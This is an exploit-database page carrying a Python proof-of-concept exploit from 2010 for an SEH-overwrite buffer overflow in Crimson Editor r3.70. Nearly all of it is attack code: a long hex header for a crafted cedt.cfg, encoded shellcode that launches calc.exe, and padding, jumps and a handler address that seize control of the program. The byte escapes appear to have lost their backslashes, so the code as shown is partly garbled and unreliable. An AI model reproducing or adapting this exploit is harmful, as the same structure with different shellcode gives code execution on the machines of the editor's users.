Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
# Published : 2010-03-21
# Author : mr_me
# Previous Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Next Title : MediaCoder (.lst) file local Buffer Overflow Exploit
#!/usr/bin/python
# ###############################################################
# Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
# Date          : 21/03/2010
# Author        : mr_me
# Bug found by  : sharpe 
# Version       : 3.70 Release
# Tested on     : XP SP3 En
# Reference		: http://www.exploit-db.com/exploits/11803
# Greetz to     : Corelan Security Team & sharpe 
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ###############################################################
# Exploits a parsing vulnerability with its own cfg file.
# create cedt.cfg and copy it to C:Program FilesCrimson Editor
# Note: I'm not sure if issue has been communicated to vendor so I sent an email
# also, surprised nobody wrote the PoC for this..
# ###############################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "~~> Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit <~~"

header = "x43x6Fx6Ex66x69x67x75x72x61x74x69x6Fx6Ex20x33x2Ex37x30x20x42x65x74x61x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x5Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x46x69x78x65x64x53x79x73x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65x72x64x61x6Ex61x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20x43x6Fx6Ex73x6Fx6Cx65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x54x65x72x6Dx69x6Ex61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65x72x64x61x6Ex61x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20x43x6Fx6Ex73x6Fx6Cx65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x64x00x00x00x04x00x00x00x19x00x00x00x20x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x50x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x0Bx00x00x00x24x28x46x69x6Cx65x4Ex61x6Dx65x29x00x00x00x00x1Cx00x00x00x24x28x50x61x67x65x4Ex75x6Dx62x65x72x29x20x2Fx20x24x28x54x6Fx74x61x6Cx50x61x67x65x29x0Bx00x00x00x24x28x43x75x72x72x44x61x74x65x29x00x00x00x00x0Ex00x00x00x43x72x69x6Dx73x6Fx6Ex20x45x64x69x74x6Fx72x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00x03x00x00x00x62x61x6Bx00x00x00x00x03x00x00x00x41x53x50x07x00x00x00x41x53x50x2Ex53x50x43x07x00x00x00x41x53x50x2Ex4Bx45x59x05x00x00x00x42x61x73x69x63x09x00x00x00x42x41x53x49x43x2Ex53x50x43x09x00x00x00x42x41x53x49x43x2Ex4Bx45x59x05x00x00x00x43x2Fx43x2Bx2Bx0Dx00x00x00x43x50x4Cx55x53x50x4Cx55x53x2Ex53x50x43x0Dx00x00x00x43x50x4Cx55x53x50x4Cx55x53x2Ex4Bx45x59x03x00x00x00x43x53x53x07x00x00x00x43x53x53x2Ex53x50x43x07x00x00x00x43x53x53x2Ex4Bx45x59x07x00x00x00x46x6Fx72x74x72x61x6Ex0Dx00x00x00x46x4Fx52x54x52x41x4Ex37x37x2Ex53x50x43x0Dx00x00x00x46x4Fx52x54x52x41x4Ex37x37x2Ex4Bx45x59x04x00x00x00x48x54x4Dx4Cx08x00x00x00x48x54x4Dx4Cx2Ex53x50x43x08x00x00x00x48x54x4Dx4Cx2Ex4Bx45x59x04x00x00x00x4Ax61x76x61x08x00x00x00x4Ax41x56x41x2Ex53x50x43x08x00x00x00x4Ax41x56x41x2Ex4Bx45x59x03x00x00x00x4Ax53x50x07x00x00x00x4Ax53x50x2Ex53x50x43x07x00x00x00x4Ax53x50x2Ex4Bx45x59x05x00x00x00x4Cx61x54x65x58x09x00x00x00x4Cx41x54x45x58x2Ex53x50x43x09x00x00x00x4Cx41x54x45x58x2Ex4Bx45x59x06x00x00x00x4Dx61x74x6Cx61x62x0Ax00x00x00x4Dx41x54x4Cx41x42x2Ex53x50x43x0Ax00x00x00x4Dx41x54x4Cx41x42x2Ex4Bx45x59x06x00x00x00x50x61x73x63x61x6Cx0Ax00x00x00x50x41x53x43x41x4Cx2Ex53x50x43x0Ax00x00x00x50x41x53x43x41x4Cx2Ex4Bx45x59x04x00x00x00x50x65x72x6Cx08x00x00x00x50x45x52x4Cx2Ex53x50x43x08x00x00x00x50x45x52x4Cx2Ex4Bx45x59x03x00x00x00x50x48x50x07x00x00x00x50x48x50x2Ex53x50x43x07x00x00x00x50x48x50x2Ex4Bx45x59x06x00x00x00x50x4Cx2Fx53x51x4Cx09x00x00x00x50x4Cx53x51x4Cx2Ex53x50x43x09x00x00x00x50x4Cx53x51x4Cx2Ex4Bx45x59x06x00x00x00x50x79x74x68x6Fx6Ex0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex53x50x43x0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex4Bx45x59x06x00x00x00x54x63x6Cx2Fx54x6Bx09x00x00x00x54x43x4Cx54x4Bx2Ex53x50x43x09x00x00x00x54x43x4Cx54x4Bx2Ex4Bx45x59x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x09x00x00x00x41x6Cx6Cx20x46x69x6Cx65x73x03x00x00x00x2Ax2Ex2Ax00x00x00x00x0Ax00x00x00x54x65x78x74x20x46x69x6Cx65x73x17x00x00x00x2Ax2Ex74x78x74x3Bx2Ax2Ex6Cx6Fx67x3Bx2Ax2Ex62x61x74x3Bx2Ax2Ex69x6Ex69x03x00x00x00x74x78x74x0Ax00x00x00x48x54x4Dx4Cx20x46x69x6Cx65x73x1Ax00x00x00x2Ax2Ex68x74x6Dx6Cx3Bx2Ax2Ex68x74x6Dx3Bx2Ax2Ex73x68x74x6Dx6Cx3Bx2Ax2Ex63x73x73x04x00x00x00x68x74x6Dx6Cx0Bx00x00x00x43x2Fx43x2Bx2Bx20x46x69x6Cx65x73x17x00x00x00x2Ax2Ex63x3Bx2Ax2Ex63x63x3Bx2Ax2Ex63x70x70x3Bx2Ax2Ex70x63x3Bx2Ax2Ex68x03x00x00x00x63x70x70x0Ax00x00x00x4Ax61x76x61x20x46x69x6Cx65x73x0Cx00x00x00x2Ax2Ex6Ax61x76x61x3Bx2Ax2Ex6Ax61x76x04x00x00x00x6Ax61x76x61x0Ax00x00x00x50x65x72x6Cx20x46x69x6Cx65x73x16x00x00x00x2Ax2Ex70x6Cx3Bx2Ax2Ex70x6Dx3Bx2Ax2Ex70x65x72x6Cx3Bx2Ax2Ex63x67x69x02x00x00x00x70x6Cx0Dx00x00x00x46x6Fx72x74x72x61x6Ex20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex66x3Bx2Ax2Ex66x6Fx72x3Bx2Ax2Ex66x37x37x3Bx2Ax2Ex66x39x30x3Bx2Ax2Ex66x39x35x01x00x00x00x66x09x00x00x00x50x48x50x20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex70x68x70x3Bx2Ax2Ex70x68x74x6Dx6Cx3Bx2Ax2Ex70x68x70x33x3Bx2Ax2Ex70x68x70x34x03x00x00x00x70x68x70x09x00x00x00x4Ax53x50x20x46x69x6Cx65x73x14x00x00x00x2Ax2Ex6Ax73x70x3Bx2Ax2Ex6Ax68x74x6Dx6Cx3Bx2Ax2Ex6Ax61x76x61x03x00x00x00x6Ax73x70x0Bx00x00x00x4Cx61x54x65x58x20x46x69x6Cx65x73x0Bx00x00x00x2Ax2Ex74x65x78x3Bx2Ax2Ex73x74x79x03x00x00x00x74x65x78"

# calc.exe
sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");

print "[+] Building payload.."

crash = "x41" * 7147 #7947
crash += "x90" * 20
crash += sc
crash += "x41" * (7947-len(crash))
crash += "xe9xe0xfcxffxff"
crash += "xebxf9x90x90"
crash += "xbdx32x46x00" # [cedt.exe]

print "[+] Writing cedt.cfg file"
exploit = header + crash
pwnfile = open('cedt.cfg','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit file created!"